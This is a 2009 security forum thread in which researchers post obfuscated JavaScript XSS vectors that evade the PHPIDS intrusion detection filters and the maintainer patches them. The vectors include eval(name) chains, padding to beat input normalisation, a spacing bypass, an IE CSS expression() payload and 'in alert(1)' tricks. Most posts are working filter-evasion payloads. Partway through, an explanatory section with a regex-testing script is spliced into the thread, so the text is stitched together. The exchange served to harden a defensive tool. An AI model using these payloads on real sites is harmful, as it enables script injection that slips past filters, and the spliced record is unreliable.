Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 03, 2009 08:34PM

Nice indeed! Thx and fixed. Sorry - Gareth - couldn't let that happen :)

Posted by: thornmaker
Date: January 03, 2009 10:07PM

with eval(name) goodness
new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
x=('e')
x=('nam')+(new Array)+x
y=('val')
y=('e')+(new Array)+y
z=this
z=z[y]
z(z(x)+x)

Posted by: Gareth Heyes
Date: January 04, 2009 07:36AM

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Posted by: Anonymous User
Date: January 04, 2009 09:25AM

Arg - the backspace newlines... I knew they would backfire one day :) Nice ones! Fixed - but not that thorough right now. I will take a deeper look later. Thx!

Posted by: Gareth Heyes
Date: January 05, 2009 03:02PM

undefined,undefined
undefined,undefined
undefined,undefined
undefined,undefined
x=('aler\
t')
undefined,undefined
undefined,undefined
undefined,undefined
undefined,undefined
this [x]
(1)
undefined,undefined
undefined,undefined
undefined,undefined
undefined,undefined

Posted by: thornmaker
Date: January 05, 2009 03:35PM

Nice one Gareth :)

Here's a modified version of my previous one

new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
x=('e')
x=('nam')+(new Array)+x
y=('val')
y=('e')+(new Array)+y
z=this
z=z[y]
z(z(x + new Array)+x)

Posted by: Anonymous User
Date: January 05, 2009 04:26PM

Nice ones indeed. Changed some bytes in the centrifuge - fixed.

Posted by: thornmaker
Date: January 05, 2009 10:24PM

@.mario: interesting change. I changed some bytes in the filler material. Your move.

xxx=('e')
xxx=('nam')+(new Array)+xxx
yyy=('val')
yyy=('e')+(new Array)+yyy
zzz=this
zzz=zzz[yyy]
zzz(zzz(xxx + new Array)+xxx)
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+
zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+
yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+
zzz+xxx+yyy+zzz

Posted by: thornmaker
Date: January 06, 2009 02:48AM

okay, I couldn't wait, so I'm going out of turn.
location.assign(1?name+1:(x))


[edit:]
@.mario: could you explain to me why this injection doesn't match the regular expression:
(?:\d\s*[|&]{2}\s*\w)|(?:[=(].+\?.+:)|(?:with\([^)]*\)\))|(?:\.\s*source\W)|(?:\?[^:]+:[^;]+(;|$))

As far as I can tell, this injection should match the last part, \?[^:]+:[^;]+(;|$), and the second part, [=(].+\?.+:... (and at least one does if I remove the parentheses from around the x, which doesn't make much sense).

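One way to settle a question like the one above is to run the filter regex on its own, outside PHPIDS, and see which alternation branch fires for a given input. The block below is an added example, not PHPIDS code and not thornmaker's: it compiles the regex quoted in the post, splits it into its five branches (the branch labels are invented for this example, not PHPIDS identifiers), and reports the matches for the string from the post, the variant without parentheses around x, and a benign control string. All three sample inputs are constructed here. Note that PHPIDS normalises input in its Converter (which includes the centrifuge discussed in this thread) before the filter rules see it, so a rule that matches in isolation but misses on the demo site points at the normalisation stage rather than at the pattern itself.

```javascript
// Added example: exercise one PHPIDS-style filter regex branch by branch.
// FILTER is the regex quoted in the post; BRANCHES are its five alternatives
// with labels invented for this example (not PHPIDS identifiers).
const FILTER = /(?:\d\s*[|&]{2}\s*\w)|(?:[=(].+\?.+:)|(?:with\([^)]*\)\))|(?:\.\s*source\W)|(?:\?[^:]+:[^;]+(;|$))/;

const BRANCHES = [
  ["numeric-logical",                /\d\s*[|&]{2}\s*\w/],
  ["ternary-after-assign-or-paren",  /[=(].+\?.+:/],
  ["with-statement",                 /with\([^)]*\)\)/],
  ["source-property",                /\.\s*source\W/],
  ["ternary-to-end",                 /\?[^:]+:[^;]+(;|$)/],
];

// Names of the branches that match the raw (un-normalised) input.
function matchingBranches(input) {
  return BRANCHES.filter(([, re]) => re.test(input)).map(([name]) => name);
}

// True if the whole filter regex would flag the raw input.
function filterHits(input) {
  return FILTER.test(input);
}

// Constructed sample inputs: the string from the post, the variant without
// parentheses around x that the post mentions, and a benign control.
const SAMPLES = [
  "location.assign(1?name+1:(x))",
  "location.assign(1?name+1:x)",
  "location.assign('/home')",
];

// One result object per sample: input, overall verdict, and branch names.
function report() {
  return SAMPLES.map(s => ({
    input: s,
    hits: filterHits(s),
    branches: matchingBranches(s),
  }));
}

for (const r of report()) {
  console.log(`${r.hits ? "HIT " : "MISS"} ${r.input} -> [${r.branches.join(", ")}]`);
}
```

Running this shows that both versions of the location.assign string are caught by the raw regex on two branches, while the control string is not flagged, which is what the post expects from reading the pattern; the difference on the live demo therefore has to come from what the Converter does to the input before matching.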
Posted by: Anonymous User
Date: January 06, 2009 03:48PM

Hi!

Phew - neat stuff. I had to do a little optimization on the centrifuge for robustness against padding obfuscation. I am too tired to look into the other issue right now - will do tomorrow.

Thx!

Posted by: thornmaker
Date: January 12, 2009 02:57PM

I'm guessing something isn't working quite like it should: http://demo.phpids.org/?test=alert%20(0%29

Posted by: Matt Presson
Date: January 12, 2009 03:29PM

It seems that if only one space is present between the alert and the open paren, it passes through.

-----------------------------------------------------------------------
(ú=(θ='',[µ=!(Φ=!θ+{})+θ,Θ=Φ[ø=+!θ]+Φ[+θ],ĩ=µ[ø],Ø=µ[º=ø+++ø],Ç=Φ[º+ø],à=ú[Φ[º+º]+Φ[+θ]+Ç+ĩ]][Ø+Ç+Θ])())[ĩ+à('•êí')](Ç+à('Á«)'))

Posted by: Anonymous User
Date: January 12, 2009 04:02PM

Ouch! Small but high-impact bug in the Converter. Fixed - thanks!

Posted by: thornmaker
Date: January 12, 2009 08:08PM

Are you sure there was just one bug? I haven't looked at the code base recently, but this one seemed too easy.
www=('e')
yyy=('val')
zzz=1+name
xxx=this
xxx[www+yyy](zzz)
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx
'superStealthyCentrifugeAvoidanceTrick'
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx
'andAgain'
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx
'oneMoreTime'
xxx+yyy+zzz

In particular, I thought the filters would catch zzz=1+name or xxx=this or xxx[www+yyy](zzz).

Posted by: vortex
Date: January 14, 2009 06:40AM

Awesome script ... I'm using it on a testbed (jailed) environment under BSD with no problems whatever. Still trying to work out the best critical "impact" level in order to protect my own back-end.

A couple of questions though...

1) Upon attempting to access the updated default_filter.xml and/or Convertor.php I receive a warning from firefox:
----
You have attempted to establish a connection with "svn.php-ids.org". However, the security certificate presented belongs to "(schokokeks.org , *.schokokeks.org)". It is possible, although unlikely, that someone may be trying to intercept your communication with this web site.
----
I'm hoping this is not me ...!

2) Assuming this can be rectified, is it permissible to run a cron job to update my own local master copies of these files on a (say) weekly basis?

Posted by: Anonymous User
Date: January 14, 2009 04:37PM

Hi!

@thornmaker: Neat. I will take care of this asap. I haven't found any time yet - but probably will do tomorrow.

@vortex: Thx!

1) Yep - that's our sponsor/hoster using a self signed cert afaik.

2) Yep. That's pretty much okay. The trunk revision can be seen as very stable. No commit without a full test run. We are using the trunk too.

Posted by: Anonymous User
Date: January 14, 2009 04:49PM

Well - couldn't keep myself back. New patterns in da house. Thx thornmaker!

Posted by: thornmaker
Date: January 14, 2009 07:59PM

oops... i accidentally the whole ids
xxx=status
s=xxx+('')
eee=s+'e'
e=eee+'val'
n=s+'n'
n=n+'ame'
y=this
y=y[e]
y(y(n)+s)
xxx+eee+xxx+eee
'foo'
xxx+eee+xxx+eee
'foo'

...

xxx+eee+xxx+eee

Posted by: Gareth Heyes
Date: January 30, 2009 10:50AM

IE only vector:-

http://www.businessinfo.co.uk/labs/phpids/phpids5.html

This rocks :D

This is the dom based injection:-
document.styleSheets(0).cssText+=name

The name payload contains:-
;body{xss:expression(window.x?0:(alert(/XSS/),window.x=1));}

Yes, I spend far too much time looking through the js/css quirks of every browser ;)

Posted by: thornmaker
Date: January 30, 2009 11:32AM

what fun style sheets are :)

Posted by: Anonymous User
Date: January 30, 2009 01:38PM

And what fun IE is - fixed :)

Posted by: Gareth Heyes
Date: January 30, 2009 01:56PM

Fixed so quickly, you spoil our fun :)
I was gonna html encode another one with js backslash escapes

Posted by: Anonymous User
Date: January 30, 2009 02:54PM

Rahaha - not allowed a js backslash encoded variant is :)

Posted by: Gareth Heyes
Date: February 02, 2009 06:07AM

this.sdfgdfgsdfg,this.sdfgdfgsdfg,this.sdfgdfgsdfg,this.sdfgdfgsdfg
Infinity in alert(1)

Posted by: Gareth Heyes
Date: February 02, 2009 11:17AM

void 1 in alert(1)

Posted by: holiman
Date: February 02, 2009 12:34PM

A variant of that:

1 in alert(1)

Posted by: Anonymous User
Date: February 03, 2009 10:49AM

Eeeek - am not at home for the next days so I just added a quick-fix. Nice find!

Posted by: Gareth Heyes
Date: February 03, 2009 11:10AM

this.sdfjhskajdhfkashdfkashdfasf in alert(1)

There are lots more:-

[this.dfkgjsdklfgjdsfgdsfgdfg].sdfjhskajdhfkashdfkashdfasf in alert(1)

'fgsdfgsdfg'.sdfkjsdkldfjkldsfg in alert(1)

stop.sdfgkldfsgsdfgsdfgdsfg in alert(1)

Posted by: Gareth Heyes
Date: February 03, 2009 01:57PM

Just for good measure ;)

http://www.businessinfo.co.uk/labs/phpids/phpids6.html

The actual vector is:-
'fgsdfgsdfg'.sdfkjsdkldfjkldsfg in eval(name,/gsdfgsdf/.sdfkjsdkldfjkldsfg)

Posted by: Anonymous User
Date: February 08, 2009 05:26AM

Hey Gareth!

Those ones really generated some headache - but the "in" issue should be fixed now. Thanks!
